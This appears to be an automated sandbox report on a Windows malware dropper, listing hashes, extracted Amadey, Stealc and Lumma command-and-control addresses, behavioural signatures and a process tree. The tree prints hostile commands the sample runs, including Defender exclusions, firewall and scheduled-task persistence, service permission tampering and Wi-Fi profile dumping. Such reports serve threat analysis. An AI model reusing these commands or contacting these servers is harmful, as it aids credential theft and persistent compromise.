Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
24-04-2024 02:02
General
-
Target
f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449.exe
-
Size
1.8MB
-
MD5
169d873778a229bcb4f010f87930cb28
-
SHA1
15d928181a3abe9fc84d21454246676baad444a8
-
SHA256
f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
-
SHA512
42630f7e98502c97806a4f241598dba61298d1874bffc7baf1bea34c3950861a182daf6798f4834b4d2865238569379a3bfa796dee953224fc29e712831170c4
-
SSDEEP
49152:13/bnTrRlJqN+zVjKQVO3LNjmd6P0uqVs:1jnTrrJqY5ORjSieG
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
https://productivelookewr.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://alcojoldwograpciw.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect ZGRat V1 2 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 2 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Detects Windows executables referencing non-Windows User-Agents 2 IoCs
-
Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
-
Detects executables Discord URL observed in first stage droppers 2 IoCs
-
Detects executables built or packed with MPress PE compressor 5 IoCs
-
Detects executables containing URLs to raw contents of a Github gist 2 IoCs
-
Detects executables containing artifacts associated with disabling Widnows Defender 2 IoCs
-
Detects executables referencing many varying, potentially fake Windows User-Agents 2 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 64 IoCs
-
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 19 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 8 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 18 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 10 IoCs
-
Drops file in Windows directory 9 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449.exe"C:\Users\Admin\AppData\Local\Temp\f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000009001\555c20b943.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\555c20b943.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\1000013002\770bfd91d8.exe"C:\Users\Admin\1000013002\770bfd91d8.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffdb83cab58,0x7ffdb83cab68,0x7ffdb83cab785⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3320 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4504 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4524 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
- Modifies registry class
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5028 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 --field-trial-handle=1952,i,15327903541021087704,17854795663768759531,131072 /prefetch:85⤵
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 8723⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\556644402199_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 3403⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 3603⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\1000218001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000218001\ISetup8.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\uss.0.exe"C:\Users\Admin\AppData\Local\Temp\uss.0.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 10165⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uss.1.exe"C:\Users\Admin\AppData\Local\Temp\uss.1.exe"4⤵
- Checks SCSI registry key(s)
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 13804⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000219001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000219001\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 3564⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"2⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilckaydy\ilckaydy.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17D8.tmp" "c:\Users\Admin\AppData\Local\Temp\ilckaydy\CSCC501F06A9DCB47BE92BE7E2EBA9558BA.TMP"4⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
-
C:\Users\Admin\Pictures\roAxNnuRNMXCoAqrjg0bsS5U.exe"C:\Users\Admin\Pictures\roAxNnuRNMXCoAqrjg0bsS5U.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u31s.0.exe"C:\Users\Admin\AppData\Local\Temp\u31s.0.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 12966⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe9⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u31s.1.exe"C:\Users\Admin\AppData\Local\Temp\u31s.1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 15045⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\BzjMowDJZ4SCiTxQXdwBdNFF.exe"C:\Users\Admin\Pictures\BzjMowDJZ4SCiTxQXdwBdNFF.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\BzjMowDJZ4SCiTxQXdwBdNFF.exe"C:\Users\Admin\Pictures\BzjMowDJZ4SCiTxQXdwBdNFF.exe"5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
-
-
-
-
